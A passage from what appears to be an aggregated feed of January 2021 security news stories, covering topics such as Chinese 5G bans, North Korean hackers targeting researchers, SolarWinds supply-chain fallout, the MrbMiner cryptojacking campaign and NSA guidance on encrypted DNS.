Reacting to the Chinese 5G Threat
As the race to build out 5G networks continues, the security of the supply chain is getting closer examination.
“A backdoor to a lawful intercept interface could yield a treasure trove of information to a malicious actor — including the current location of a target, details including when and where a call was placed, and even the ability to eavesdrop or listen into a current call,” Russ Mohr, engineer and Apple evangelist at MobileIron, told Threatpost. “A backdoor is an extremely valuable resource to a bad actor, and it is likely that it would be much more valuable as an asset to collect data than as a mounting point for an attack — although it may provide an opportunity to inject ransomware into a 5G network targeting a mobile carrier.”
Huawei for one has vigorously denied the allegations. A senior Huawei official told the paper: “The use of the lawful interception interface is strictly regulated and can only be accessed by certified personnel of the network operators. No Huawei employee is allowed to access the network without an explicit approval from the network operator,” the official said.
Accessing the backdoors without carrier permission “is extremely implausible and would be discovered immediately,” the official added.
Huawei and other Chinese telecommunications companies have also been widely accused of stealing American technology and trade secrets and selling the competing products at a far cheaper price, which has led to the wide adoption of Chinese products to build out networks all over the world.
In response to all of the concerns, the Trump administration set out to send a strong message back to China with help from Pai.
In Dec. 2018, Huawei executive Meng Wanzhou was arrested in Vancouver International Airport on fraud charges from the U.S. Department of Justice. Meng is still in Canada, living under house arrest in very opulent surroundings, awaiting trial for allegedly for doing business with Iran in violation of U.S. sanctions.
Meng has denied the allegations.
State-owned China Mobile was banned by the FCC from providing communications services in the U.S. in 2019. Further, Pai’s FCC designated ZTE and Huawei national security threats, forbid any U.S. provider from doing business with the Chinese companies and even got Congress to approve $1.9 billion for providers to rip out and replace existing Chinese telecom equipment on their networks.
The Department of Justice indicted Huawei in 2019 for stealing T-Mobile’s intellectual property. CNET also reported Huawei is suspected to be working with the Chinese government to help identify Uighur minorities, in violation of human rights. In June, the Trump administration designated Huawei as backed by the Chinese military.
On Jan. 18, just two days before leaving office, President Trump hit Huawei suppliers with additional restrictions.
Is the response overblown? Canada, Germany and the U.K., among others, are taking no such extreme steps. Yet India and other countries have followed suit in banning Chinese telecommunications gear from new networks.
“The general sentiment among security practitioners agrees with the core of what Ajit Pai noted,” Brandon Hoffman, CISO at Netenrich told Threatpost. “It is hard to ignore the concrete examples that have been found over the years of this very issue.”
5G: A Trade Chip?
That said, others have said the bans may have played into trade negotiations with China.
“The telecom industry is strategic to all of our economies, and I think it’s a major trade chip that’s being used,” Gordon Smith, CEO of Sagent telecom told The Hill in the wake of the FCC’s 2019 sanctions against Chinese telecom companies told The Hill. “And I think U.S. action now is to get action from China on other matters.”
It’s still unclear whether the new Biden administration and its new FCC Chair Jessica Rosenworcel will take the same hawkish stance with China, but she very publicly broke with Pai on Trump’s 2019 tariffs on Chinese goods, warning they would stall the rollout of 5G in the U.S.
“The administration’s trade war with China threatens to increase the costs of wireless infrastructure by hundreds of millions of dollars at a critical moment in the race to 5G,” Rosenworcel, then an FCC board member said in a Politico op-ed. “Getting caught in a trade war that impacts so much 5G network deployment is foolhardy. It’s not the way to win. It sacrifices our leadership in technology.”
Dutch police arrested two people for the illegal sale of COVID-19 patient data
26.1.2021 BigBrothers Securityaffairs
Dutch police arrested two individuals for allegedly selling COVID-19 patient data stolen from the Dutch health ministry.
Dutch police have arrested two individuals in the country for selling COVID-19 patient data stolen from the national COVID-19.
The availability of COVID-19 patient data in the cybercrime underground was spotted by the RTL Nieuws reporter Daniel Verlaan.
Verlaan discovered ads for stolen Dutch citizen data advertised on multiple instant messaging apps, including Telegram, Snapchat, and Wickr.
Dutch police arrested the duo within 24 hours of the complaint.
“On Friday, January 22, the police and the Public Prosecution Service received reports from the GGD that personal data from GGD systems would be offered for sale on Telegram. The cybercrime team of the Central Netherlands police immediately started an investigation. This investigation soon led to two employees of the GGD call center. The police immediately tracked them down. The suspects were both in Amsterdam on Saturday evening, where they were arrested and taken to a cell. It concerns a 21-year-old man from Heiloo and a 23-year-old man from Alblasserdam. The men’s homes were searched; computers have been seized.” reads the press release published by the Dutch Police.
“Stealing and selling or reselling personal data is a serious crime. Police and Public Prosecution are on top of this. Two people were arrested in this case within 24 hours.”
According to the Dutch newspaper, millions of patient details were offered for sale, including address details, telephone, and BSN identifiers (Dutch social security number). Data appears to be from the two most important systems of the Dutch Municipal Health Service (GGD).
“On chat services such as Telegram, Snapchat and Wickr, private data from the GGD systems has been offered for sale by dozens of accounts and in various large chat groups for months. Some accounts offer to look up the details of a specific person. That costs between 30 and 50 euros and then you will receive the home and email address and telephone and citizen service number from someone.” reads the post published by RTL Nieuws.
“Other accounts offer large datasets containing the private data of many tens of thousands of Dutch people. Criminals charge thousands of euros for this because it is relatively unique that social security numbers are sold on such a large scale. A social security number is very sensitive and can be misused for identity fraud.”
The data was allegedly stolen from two government systems used by the GGD named CoronIT, which contains details about Dutch citizens who made a COVID-19 test, and HPzone Light, one of the DDG’s contact-tracing systems.
Data was offered for prices ranging from €30 to €50 per person.
Verlaan discovered that the two suspects had access to official Dutch government COVID-19 systems because they were working in DDG call centers.
Experts pointed out that the availability of the BSN number (Dutch social security number) could expose citizens to financial fraud and identity theft.
Google Warning: North Korean Gov Hackers Targeting Security Researchers
26.1.2021 BigBrothers Securityweek
Google late Monday raised the alarm about a “government-backed entity based in North Korea” targeting -- and hacking into -- computer systems belonging to security researchers.
Google’s Threat Analysis Group (TAG), a team that monitors global APT activity, said the ongoing campaign is aimed at security researchers working on vulnerability research and development at different companies and organizations.
The campaign, which is well organized across multiple online platforms, included drive-by browser compromises from booby-trapped websites.
“In addition to targeting users via social engineering, we have also observed several cases where researchers have been compromised after visiting the actors’ blog. In each of these cases, the researchers have followed a link on Twitter to a write-up hosted on blog.br0vvnn[.]io, and shortly thereafter, a malicious service was installed on the researcher’s system and an in-memory backdoor would begin beaconing to an actor-owned command and control server,” Google’s Adam Weidemann explained.
“At the time of these visits, the victim systems were running fully patched and up-to-date Windows 10 and Chrome browser versions,” Weidewmann said, suggesting the possible use of zero-day exploits.
He said Google was unable to confirm the mechanism of compromise and asked for the public to report Chrome vulnerabilities, including those being exploited in the wild (ITW), to its Chrome's Vulnerability Reward Program. We encourage anyone who discovers a Chrome vulnerability to report that activity via the Chrome VRP submission process.
Google said the actors behind this campaign are linked to a government-backed entity based in North Korea, worked over time to build credibility and connect with security researchers.
The actors established a research blog and multiple Twitter profiles and used the Twitter accounts to post links to their blog, post videos of their claimed exploits and to amplify and retweet posts from other accounts that they control.
Google found that the lure blog contained write-ups and analysis of vulnerabilities that have been publicly disclosed, including “guest” posts from unwitting legitimate security researchers, likely in an attempt to build additional credibility with other security researchers.
“While we are unable to verify the authenticity or the working status of all of the exploits that they have posted videos of, in at least one case, the actors have faked the success of their claimed working exploit,” Weidermann said, providing screenshots and proof of the operation.
From the Google TAG blog:
The actors have been observed targeting specific security researchers by a novel social engineering method. After establishing initial communications, the actors would ask the targeted researcher if they wanted to collaborate on vulnerability research together, and then provide the researcher with a Visual Studio Project. Within the Visual Studio Project would be source code for exploiting the vulnerability, as well as an additional DLL that would be executed through Visual Studio Build Events. The DLL is custom malware that would immediately begin communicating with actor-controlled C2 domains.
Weidemann said the actors have used accounts on Twitter, LinkedIn, Telegram, Discord, Keybase and e-mail, mostly on users running Microsoft’s Windows operating system.
"If you are concerned that you are being targeted, we recommend that you compartmentalize your research activities using separate physical or virtual machines for general web browsing, interacting with others in the research community, accepting files from third parties and your own security research,” Weidemann added.
Russian Hack of US Agencies Exposed Supply Chain Weaknesses
26.1.2021 BigBrothers Securityweek
The elite Russian hackers who gained access to computer systems of federal agencies last year didn’t bother trying to break one by one into the networks of each department.
Instead, they got inside by sneaking malicious code into a software update pushed out to thousands of government agencies and private companies.
It wasn’t surprising that hackers were able to exploit vulnerabilities in what’s known as the supply chain to launch a massive intelligence gathering operation. U.S. officials and cybersecurity experts have sounded the alarm for years about a problem that has caused havoc, including billions of dollars in financial losses, but has defied easy solutions from the government and private sector.
“We’re going to have to wrap our arms around the supply-chain threat and find the solution, not only for us here in America as the leading economy in the world, but for the planet,” William Evanina, who resigned last week as the U.S. government’s chief counterintelligence official, said in an interview. “We’re going to have to find a way to make sure that we in the future can have a zero-risk posture, and trust our suppliers.”
In general terms, a supply chain refers to the network of people and companies involved in the development of a particular product, not dissimilar to a home construction project that relies on a contractor and a web of subcontractors. The sheer number of steps in that process, from design to manufacture to distribution, and the different entities involved give a hacker looking to infiltrate businesses, agencies and infrastructure numerous points of entry.
This can mean no single company or executive bears sole responsibility for protecting an entire industry supply chain. And even if most vendors in the chain are secure, a single point of vulnerability can be all that foreign government hackers need. In practical terms, homeowners who construct a fortress-like mansion can nonetheless find themselves victimized by an alarm system that was compromised before it was installed.
The most recent case targeting federal agencies involved Russian government hackers who are believed to have sneaked malicious code into popular software that monitors computer networks of businesses and governments. That product is made by a Texas-based company called SolarWinds that has thousands of customers in the federal government and private sector.
That malware gave hackers remote access to the networks of multiple agencies. Among those known to have been affected are the departments of Commerce, Treasury and Justice.
For hackers, the business model of directly targeting a supply chain is sensible.
“If you want to breach 30 companies on Wall Street, why breach 30 companies on Wall Street (individually) when you can go to the server — the warehouse, the cloud — where all those companies hold their data? It’s just smarter, more effective, more efficient to do that,” Evanina said.
Though President Donald Trump showed little personal interest in cybersecurity, even firing the head of the Department of Homeland Security’s cybersecurity agency just weeks before the Russian hack was revealed, President Joe Biden has said he will make it a priority and will impose costs on adversaries who carry out attacks.
Supply chain protection will presumably be a key part of those efforts, and there is clearly work to be done. A Government Accountability Office report from December said a review of 23 agencies’ protocols for assessing and managing supply chain risks found that only a few had implemented each of seven “foundational practices” and 14 had implemented none.
U.S. officials say the responsibility can’t fall to the government alone and must involve coordination with private industry.
But the government has tried to take steps, including through executive orders and rules. A provision of the National Defense Authorization Act barred federal agencies from contracting with companies that use goods or services from five Chinese companies, including Huawei. The government’s formal counterintelligence strategy made reducing threats to the supply chain one of five core pillars.
Perhaps the best-known supply chain intrusion before SolarWinds is the NotPetya attack in which malicious code found to have been planted by Russian military hackers was unleashed through an automatic update of Ukrainian tax-preparation software, called MeDoc. That malware infected its customers, and the attack overall caused more than $10 billion in damage globally.
The Justice Department in September charged five Chinese hackers who it said had compromised software providers and then modified source code to allow for further hacks of the providers’ customers. In 2018, the department announced a similar case against two Chinese hackers accused of breaking into cloud service providers and injecting malicious software.
“Anyone surprised by SolarWinds hasn’t been paying attention,” said Rep. Jim Langevin, a Rhode Island Democrat and member of the Cyberspace Solarium Commission, a bipartisan group that issued a white paper calling for the protection of the supply chain through better intelligence and information sharing.
Part of the appeal of a supply chain attack is that it’s “low-hanging fruit,” said Brandon Valeriano, a cybersecurity expert at the Marine Corps University. A senior adviser to the solarium commission, he says it’s not really known just how dispersed the networks are and that flaws in the supply chain are not uncommon.
“The problem is we basically don’t know what we’re eating.” Valeriano said. “And sometimes it comes up later that we choke on something -- and often we choke on things.”
N. Korean Hackers Targeting Security Experts to Steal Undisclosed Researches
26.1.2021 BigBrothers Thehackernews
Google on Monday disclosed details about an ongoing campaign carried out by a government-backed threat actor from North Korea that has targeted security researchers working on vulnerability research and development.
The internet giant's Threat Analysis Group (TAG) said the adversary created a research blog and multiple profiles on various social media platforms such as Twitter, Twitter, LinkedIn, Telegram, Discord, and Keybase in a bid to communicate with the researchers and build trust.
The goal, it appears, is to steal exploits developed by the researchers for possibly undisclosed vulnerabilities, thereby allowing them to stage further attacks on vulnerable targets of their choice.
"Their blog contains write-ups and analysis of vulnerabilities that have been publicly disclosed, including 'guest' posts from unwitting legitimate security researchers, likely in an attempt to build additional credibility with other security researchers," said TAG researcher Adam Weidemann.
In one instance, the actor used Twitter to share a YouTube video of what it claimed to be an exploit for a recently patched Windows Defender flaw (CVE-2021-1647), when in reality, the exploit turned out to be fake.
The North Korean hackers are also said to have used a "novel social engineering method" to hit security researchers by asking them if they would like to collaborate on vulnerability research together and then provide the targeted individual with a Visual Studio Project.
This Visual Studio Project, besides containing the source code for exploiting the vulnerability, included a custom malware that establishes communication with a remote command-and-control (C2) server to execute arbitrary commands on the compromised system.
What's more, TAG said it observed several cases where researchers were infected after visiting the research blog, following which a malicious service was installed on the machine, and an in-memory backdoor would begin beaconing to a C2 server.
With the victim systems running fully patched and up-to-date versions of Windows 10 and Chrome web browser, the exact mechanism of compromise remains unknown. But it's suspected that the threat actor likely leveraged zero-day vulnerabilities in Windows 10 and Chrome to deploy the malware.
"If you are concerned that you are being targeted, we recommend that you compartmentalize your research activities using separate physical or virtual machines for general web browsing, interacting with others in the research community, accepting files from third parties and your own security research," Weidemann said.
FSB warns Russian businesses of cyber attacks as retaliation for SolarWinds hack
23.1.2021 BigBrothers Securityaffairs
Russian authorities are alerting Russian organizations of potential cyberattacks launched by the United States in response to SolarWinds attack.
The Russian intelligence agency FSB has issued a security alert this week warning Russian organizations of potential cyberattacks launched by the United States in response to the SolarWinds supply chain attack.
The alert was issued after officials of the new Biden administration declared that attacks like the SolarWinds ones could trigger a response of their government.
The Russian government always denied any involvement in the SolarWinds attack.
The Russian National Coordination Center for Computer Incidents (NKTSKI) published a security bulletin to warn Russian businesses of the imminent risk of cyber attacks as a retaliation for the SolarWinds attacks that US Government agencies attributed to Moscow.
The Russian National Coordination Center for Computer Incidents (NKTSKI) was created by the Federal Security Service (FSB) in order to prevent, detect and counter cyberattacks on critical infrastructure facilities as well as repair damage from such attacks.
The news of the bulletin was first reported by ZDNet that also shared the alert (Russian language) published by the Russian Government.
The alert also includes a set of recommendations to Russian businesses to prevent cyber attacks.
Biden Orders Intelligence Agencies to Assess SolarWinds Hack
23.1.2021 BigBrothers Securityweek
Just days into his leadership role, U.S. President Joe Biden has instructed U.S. intelligence agencies to provide him with a detailed assessment of the SolarWinds hack, which fueled a global cyber espionage campaign impacting many high-profile government agencies and businesses.
The U.S. government and others have said Russia is likely behind the highly sophisticated attack on SolarWinds.
“Even as we work with Russia to advance U.S. interests, so too we work to hold Russia to account for its reckless and adversarial actions,” White House Press Secretary Jen Psaki said in a press briefing Thursday. “And to this end, the President is also issuing a tasking to the intelligence community for its full assessment of the SolarWinds cyber breach, Russian interference in the 2020 election, its use of chemical weapons against opposition leader Alexei Navalny, and the alleged bounties on U.S. soldiers in Afghanistan.”
In December, Biden said the perpetrators of the massive cyberattack on the US government must face consequences.
"We can't let this go unanswered," Biden said at the time. "That means making clear, and publicly, who is responsible for the attack and taking meaningful steps to hold them in account."
"When I learn the extent of the damage and, in fact, who is formally responsible, they can be assured that we will respond, and probably respond in kind," he added. "There are many options which I will not discuss now."
Kaspersky recently found a link between the Sunburst malware and Kazuar, a piece of malware previously connected to a Russian cyberspy group known as Turla.
Symantec this week said the attackers leveraged a piece of malware named Raindrop for lateral movement and deploying additional payloads.
SQL Server Malware Tied to Iranian Software Firm, Researchers Allege
22.1.2021 BigBrothers Cryptocurrency Threatpost
Researchers have traced the origins of a campaign – infecting SQL servers to mine cryptocurrency – back to an Iranian software firm.
Researchers have made new discoveries surrounding the source of a previously-uncovered cryptomining operation that has targeted internet-facing database servers.
The campaign, dubbed MrbMiner, was discovered in September 2020 downloading and installing a cryptominer on thousands of SQL servers. Now, researchers with Sophos have tracked the origin of the campaign to what they claim is a small software development company based in Iran.
“The name of an Iran-based software company was hardcoded into the miner’s main configuration file,” said researchers with Sophos in a Thursday analysis. “This domain is connected to many other zip files also containing copies of the miner. These zip files have in turn been downloaded from other domains, one of which is mrbftp.xyz.”
2020 Reader Survey: Share Your Feedback to Help Us Improve
Researchers said that their records don’t reveal exactly how the malware gained a foothold on the database servers. However, they pointed to techniques used by the MyKings SQL-attacking botnet or Lemon_Duck cryptocurrency botnet as a possibility. Both of these botnets prey on various unpatched vulnerabilities in systems, with some additional infection vector tricks up their sleeve (including remote desktop protocol password brute-forcing for Lemon Duck).
Once downloaded onto the system, the cryptominer payload and configuration files are unpacked. A Microsoft SQL server (sqlservr.exe) process first launches a file called assm.exe, which is a trojan that serves as a downloader. Assm.exe then downloads the cryptominer payload from a web server, and connects to its command-and-control (C2) server to report the successful download and execution of the miner.
“In most cases, the payload was a file named sys.dll, which (despite its file suffix) was not a Windows DLL but a zip archive containing a cryptominer binary, configuration file, and related files,” said researchers.
Links
While the attack seemed typical of most cryptominer attacks targeting internet-facing servers, what sets it apart is that the attacker “appears to have thrown caution to the wind about concealing their identity,” said Gabor Szappanos, threat research director with Sophos Labs.
Researchers discovered a slew of records relating to the miner’s configuration, its domains and IP addresses that pointed to a single point of origin: an (unnamed) small software company based in Iran. For instance, one give away was that the server utilized to host the payloads for the campaign also hosted a domain (vihansoft.ir), which is a website tied to the software company.
“We found a reference to the business behind vihansoft.ir in the Persian-language mapping website neshan.org,” said researchers. “Similar to Google Maps or Waze, Neshan includes business information as part of its mapping services, and the entry for a company that lists vihansoft.ir as its website, and names its managing director.”
Researchers noted that cryptojacking may be utilized here by people who live in countries like Iran that are under strict international financial sanctions by the U.S., in order to bypass the traditional banking system.
Servers: Lucrative Cryptojacking Target
While many attackers target computers with their cryptomining malware, researchers stressed that database servers are an attractive target for attackers because they are used for resource-intensive processes and thus contain potent processing capability.
IT administrators hosting a database need significant performance requirements, including the ability to process large loads of data reads and writes, as well as high levels of RAM and processor overhead to respond rapidly to queries, said researchers.
“As a result, servers hosting databases fall on the beefier side of the performance scale, which is why they’re an excellent target for attackers whose goals include the distribution of cryptocurrency miners,” said researchers.
Attackers have caught on to this over the past years. In 2019, up to 50,000 servers were infected as part of a high-profile cryptojacking campaign, believed to orchestrated by Chinese-language adversaries. In 2018, MassMiner emerged to target Windows servers with various well-known exploits, all within a single executable — including the EternalBlue NSA hacking tool.
FBI Warns of Employee Credential Phishing via Phone, Chat
19.1.2021 BigBrothers Securityweek
The Federal Bureau of Investigation has issued a Private Industry Notification (PIN) to warn of attacks targeting enterprises, in which threat actors attempt to obtain employee credentials through vishing or chat rooms.
Taking advantage of the COVID-19 pandemic, which has forced the broad adoption of telework, cyber-criminals and threat actors are attempting to exploit possible misconfiguration and lack of monitoring for remote network access and user privileges.
An observed shift in tactics, the FBI says, is the targeting of all employee credentials, not exclusively of those individuals who might have higher access and privileges based on their corporate position.
Cybercriminals were observed employing social engineering to target both US-based and international-based employees of large companies. As part of vishing attacks (voice phishing performed during phone calls) using VoIP platforms, employees were tricked into accessing fake web pages and entering their corporate usernames and passwords.
“After gaining access to the network, many cyber criminals found they had greater network access, including the ability to escalate privileges of the compromised employees’ accounts, thus allowing them to gain further access into the network often causing significant financial damage,” the FBI explains.
In one attack, the Agency says, the cybercriminals found an employee via the company’s chatroom, and then convinced them into logging into a fake VPN page to reveal their credentials.
Using the compromised username and password, the threat actors then logged into the company’s VPN and started searching for employees who had higher privileges. They located an employee who could make username and email changes and used a chat room messaging service to phish for their credentials.
The infamous July 2020 Twitter hack, in which three youngsters gained access to social platform’s internal tools and took control of high-profile accounts, is representative of how such an attack is performed: the cybercriminals called multiple employees to phish for their credentials, until they finally harvested those having the privileges they were looking for.
“The Hackers used personal information about the employees to convince them that the Hackers were legitimate and could, therefore, be trusted. While some employees reported the calls to Twitter’s internal fraud monitoring team, at least one employee believed the Hackers’ lies,” the New York Department of Financial Services said in a report detailing the incident.
To mitigate such attacks, the FBI advises organizations to implement multi-factor authentication (MFA) for employee accounts, adopt the least privilege principle (especially for new employee accounts), actively monitor the environment for unauthorized access or modifications, employ network segmentation, and issue two accounts for admins: one for email and another for making changes to systems.
“With so many people working from home, they are more likely to fall for this type of vishing scam because they don't have the protective environment of being in their corporate offices,” James McQuiggan, security awareness advocate at KnowBe4, said in an emailed comment.
“Organizations want to include vishing exercises within their robust security awareness, behaviors, and culture programs to ensure employees are aware of current dangers and can take the appropriate actions to reduce the risk of an attack by unauthorized people,” McQuiggan continued.
Rob Joyce Appointed Director of Cybersecurity at NSA
19.1.2021 BigBrothers Securityweek
The U.S. National Security Agency on Friday announced that Rob Joyce, an official who is highly respected in the cybersecurity community, has been named the agency’s new director of cybersecurity.
Rob Joyce named director of cyber at NSA
Joyce, who according to his LinkedIn profile has been working for the Defense Department for the past 32 years, replaces Anne Neuberger, who has been appointed Deputy National Security Advisor for Cyber and Emerging Technology by the upcoming Biden administration.
Before taking the role of director of cyber at the NSA, Joyce represented the intelligence agency in the UK, and served as senior adviser to the NSA director on cybersecurity strategy.
Prior to that, he was cybersecurity coordinator in the Trump administration’s National Security Council. Following his departure, the White House announced a controversial decision to eliminate the role of cybersecurity coordinator.
Joyce also served as head of the NSA’s Tailored Access Operations (TAO) hacking unit.
President Biden’s Peloton exercise equipment under scrutiny
18.1.2021 BigBrothers Securityaffairs
President Joe Biden can’t bring his Peloton exercise equipment to the White House due to security reasons.
According to a Popular Mechanics report, President Joe Biden is going to move to the White House and likely he will have to give up his Peloton exercise equipment for security reasons.
Peloton exercise equipment’s popularity surged during the pandemic, it allows users to do gymnastic exercise from home, interacting with each other within an online community.
Peloton devices are connected online and are equipped with a camera and microphone that give the users an immersive experience and communications capabilities. On the other side, these features pose a potential risk to the user in case of a hack, and President Joe Biden is a privileged target.
To secure the exercise equipment, Biden’s Peloton may have to be modified, removing the microphone, camera and networking equipment.
“If you really want that Peloton to be secure, you yank out the camera, you yank out the microphone, and you yank out the networking equipment … and you basically have a boring bike,” Max Kilger, Ph.D., director of the Data Analytics Program and Associate Professor in Practice at the University of Texas at San Antonio, told Popular Mechanics. “You lose the shiny object and the attractiveness.”
The case has an important precedent, three years ago The Verge revealed that a person close to the company confirmed that Michelle Obama had a Peloton, but it was a modified model, without a camera or microphone.
Peloton runs a custom operating system built on top of Android’s own system and is equipped with networking equipment to access the user’s home WiFi network or a hard-wired connection, like Ethernet.
“That allows the bike to communicate with your Apple Watch or Fitbit, which are internet-of-things (IoT) devices that contain microphones. If a hacker found a way to infect Biden’s Peloton, then it’s theoretically possible they could hop from the bike to the watch and vice versa,” Kilger added.
Several hacking communities online focus on IoT devices, including the Peloton equipment. The risk is that someone could find a way to compromise the equipment with malware, then move laterally within the host network and compromise any other connected device.
The report pointed out that Secret Service can take precautions to secure the gym sessions of the President. They could set up the bike in a special gym area where it is not allowed to discuss classified topics. Another countermeasure is to use a hardwired connection for the President’s Peloton equipment that’s separate from the rest of the White House network.
EU Regulator: Hackers ‘Manipulated’ Stolen Vaccine Documents
17.1.2021 BigBrothers Securityweek
The European Union’s drug regulator said Friday that COVID-19 vaccine documents stolen from its servers by hackers have been not only leaked to the web, but “manipulated.”
The European Medicines Agency said that an ongoing investigation showed that hackers obtained emails and documents from November related to the evaluation of experimental coronavirus vaccines. The agency, which regulates drugs and medicines across the 27-member EU, had troves of confidential COVID-19 data as part of its vaccine approval process.
“Some of the correspondence has been manipulated by the perpetrators prior to publication in a way which could undermine trust in vaccines,” the Netherlands-based agency said.
“We have seen that some of the correspondence has been published not in its integrity and original form and, or with, comments or additions by the perpetrators.”
The agency did not explain exactly what information was altered — but cybersecurity experts say such practices are typical of disinformation campaigns launched by governments.
Italian cybersecurity firm Yarix said it found the 33-megabyte leak on a well-known underground forum with the title “Astonishing fraud! Evil Pfffizer! Fake vaccines!” It was apparently first posted on Dec. 30 and later appeared on other sites, including on the dark web, the company said on its website.
Yarix said “the intention behind the leak by cybercriminals is certain: to cause significant damage to the reputation and credibility of EMA and Pfizer.”
Cybersecurity consultant Lukasz Olejnik said he believed the intention was far more broad.
“I fear this release has a significant potential of sowing distrust in the EMA process, the vaccines, and vaccination in Europe in general,” he said. “While it is unclear as to who may be behind this operation, it is evident that someone determined allocated resources to it.”
“This is an unprecedented operation targeting the validation of pharmaceutical material, with potentially broad negative effects on the health of Europeans if it leads to undermining trust in the vaccine,” Olejnik added.
The EMA said law enforcement authorities are taking “necessary action” in response to the hack and a criminal investigation is ongoing.
It said that given the devastating toll of the pandemic, there was an “urgent public health need to make vaccines available to EU citizens as soon as possible.” The EMA insisted that despite that urgency, its decisions to recommend the green-lighting of vaccines were based “on the strength of the scientific evidence on a vaccine’s safety, quality and efficacy, and nothing else.”
The EMA, which is based in Amsterdam, came under heavy criticism from Germany and other EU member countries in December for not approving vaccines against the virus more quickly. The agency issued its first recommendation for the Pfizer and BioNTech vaccine weeks after the shot received approval in Britain, the United States, Canada and elsewhere.
The EMA recommended a second vaccine, made by Moderna, for use earlier this month. A third shot made by AstraZeneca and Oxford is currently under consideration by the agency.
NSA Publishes Guidance for Enterprises on Adoption of Encrypted DNS
16.1.2021 BigBrothers Securityweek
The National Security Agency (NSA) on Wednesday published guidance for businesses on the adoption of an encrypted domain name system (DNS) protocol, specifically DNS over HTTPS.
Designed to translate the domain names included in URLs into IP addresses, for an easier navigation of the Internet, DNS has become a popular attack vector, mainly because requests and responses are transmitted in plaintext.
DNS over HTTPS, or DoH, aims to address this shortcoming by sending DNS requests over HTTPS, encrypted, and thus protecting traffic between a client and a DNS resolver. DoH improves privacy and integrity, preventing eavesdropping and DNS traffic manipulation, and is enjoying increasing adoption among enterprises.
To ensure they can continue to govern DNS usage within their networks, enterprises need to allow only for a specific DoH resolver to be used. The use of DNS controls within enterprise environments can prevent techniques that threat actors use for initial access, data exfiltration, or command and control.
“Using DoH with external resolvers can be good for home or mobile users and networks that do not use DNS security controls. For enterprise networks, however, NSA recommends using only designated enterprise DNS resolvers in order to properly leverage essential enterprise cybersecurity defenses, facilitate access to local network resources, and protect internal network information,” the NSA notes.
Enterprises can use either own-operated DNS servers or external services, but support for encrypted DNS requests such as DoH is crucial for ensuring local privacy and integrity protections, NSA notes. The agency also recommends disabling other encrypted DNS resolvers and ensuring that all DNS traffic, either encrypted or not, is sent to the designated enterprise DNS resolver only.
“However, if the enterprise DNS resolver does not support DoH, the enterprise DNS resolver should still be used and all encrypted DNS should be disabled and blocked until encrypted DNS capabilities can be fully integrated into the enterprise DNS infrastructure,” the agency explains.
The newly published NSA guidance not only provides information on how DNS and DoH work, but also details the purpose behind the DoH design, as well as why enterprise networks should be appropriately configured to add benefits to DNS security controls.
By applying the provided recommendations, the NSA says, enterprise network owners and admins can balance privacy and governance when it comes to DNS.
NSA Suggests Enterprises Use 'Designated' DNS-over-HTTPS' Resolvers
16.1.2021 BigBrothers Thehackernews
The U.S. National Security Agency (NSA) on Friday said DNS over HTTPS (DoH) — if configured appropriately in enterprise environments — can help prevent "numerous" initial access, command-and-control, and exfiltration techniques used by threat actors.
"DNS over Hypertext Transfer Protocol over Transport Layer Security (HTTPS), often referred to as DNS over HTTPS (DoH), encrypts DNS requests by using HTTPS to provide privacy, integrity, and 'last mile' source authentication with a client's DNS resolver," according to the NSA's new guidance.
Proposed in 2018, DoH is a protocol for performing remote Domain Name System resolution via the HTTPS protocol.
One of the major shortcomings with current DNS lookups is that even when someone visits a site that uses HTTPS, the DNS query and its response is sent over an unencrypted connection, thus allowing third-party eavesdropping on the network to track every website a user is visiting.
Even worse, the setup is ripe for carrying out man-in-the-middle (MiTM) attacks simply by changing the DNS responses to redirect unsuspecting visitors to a malware-laced site of the adversary's choice.
Thus by using HTTPS to encrypt the data between the DoH client and the DoH-based DNS resolver, DoH aims to increase user privacy and security by preventing eavesdropping and manipulation of DNS data by MiTM attacks.
To that effect, the NSA recommends using only designated enterprise DNS resolvers to achieve the desired cybersecurity defense, while noting that such resolvers will be bypassed completely when a client has DoH enabled and is configured to use a DoH resolver not designated by the enterprise.
The gateway, which is used to forward the query to external authoritative DNS servers in the event the enterprise DNS resolver does not have the DNS response cached, should be designed to block DNS, DoH, and DNS over TLS (DoT) requests to external resolvers and DNS servers that are not from the enterprise resolver, the agency added.
Although DoH protects DNS transactions from unauthorized modification, the NSA cautioned of a "false sense of security."
"DoH does not guarantee protection from cyber threat actors and their ability to see where a client is going on the web," it said. "DoH is specifically designed to encrypt only the DNS transaction between the client and resolver, not any other traffic that happens after the query is satisfied."
"Enterprises that allow DoH without a strategic and thorough approach can end up interfering with network monitoring tools, preventing them from detecting malicious threat activity inside the network, and allowing cyber threat actors and malware to bypass the designated enterprise DNS resolvers."
What's more, the encryption does nothing to prevent the DNS provider from seeing both the lookup requests as well as the IP address of the client making them, effectively undermining privacy protections and making it possible for a DNS provider to create detailed profiles based on users' browsing habits.
Oblivious DNS-over-HTTPS (ODoH), announced last month by engineers at Apple, Cloudflare, and Fastly, aims to address this issue. It prevents the DoH resolver from knowing which client requested what domain names bypassing all requests via a proxy that separates the IP addresses from the queries, "so that no single entity can see both at the same time."
Put differently, this means the proxy does not know the contents of queries and responses, and the resolver does not know the IP addresses of the clients.
Secondly, the use of DoH also doesn't negate the possibility that resolvers that communicate with malicious servers upstream could still be susceptible to DNS cache poisoning.
"DNSSEC should be used to protect the upstream responses, but the DoH resolver may not validate DNSSEC," the NSA said. "Enterprises that do not realize which parts of the DNS process are vulnerable could fall into a false sense of security."
Cloud Attacks Are Bypassing MFA, Feds Warn
15.1.2021 BigBrothers Threatpost
CISA has issued an alert warning that cloud services at U.S. organizations are being actively and successfully targeted.
The Feds are warning that cybercriminals are bypassing multi-factor authentication (MFA) and successfully attacking cloud services at various U.S. organizations.
According to an alert issued Wednesday by the Cybersecurity and Infrastructure Security Agency (CISA), there have been “several recent successful cyberattacks” focused on compromising the cloud. Most of the attacks are opportunistic, taking advantage of poor cloud cyber-hygiene and misconfigurations, according to the agency.
“These types of attacks frequently occurred when victim organizations’ employees worked remotely and used a mixture of corporate laptops and personal devices to access their respective cloud services,” the alert outlined. “Despite the use of security tools, affected organizations typically had weak cyber-hygiene practices that allowed threat actors to conduct successful attacks.”
2020 Reader Survey: Share Your Feedback to Help Us Improve
For instance, in one case, an organization did not require a virtual private network (VPN) for remote employees accessing the corporate network.
“Although their terminal server was located within their firewall, due to remote work posture, the terminal server was configured with port 80 open to allow remote employees to access it—leaving the organization’s network vulnerable [to brute-forcing],” CISA explained.
The agency also noted that phishing and possibly a “pass-the-cookie” attack have been the primary attack vectors for the cloud attacks.
Phishing and Bypassing MFA
